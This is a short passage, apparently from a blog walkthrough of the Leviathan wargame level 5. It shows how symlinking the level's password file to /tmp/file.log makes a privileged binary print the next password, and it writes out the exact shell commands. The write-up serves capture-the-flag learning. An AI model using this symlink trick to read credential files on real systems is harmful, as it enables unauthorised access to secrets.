If we create it using something like the following command and run ./leviathan5 whatever what in the file.
echo "Hello world" > /tmp/file.log && ./leviathan5Using what we know, we can create a symbolic link to the password file and use ./leviathan5 to print it out to us. Use the following command to get the password:
ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log && ~/leviathan5
No comments:
Post a Comment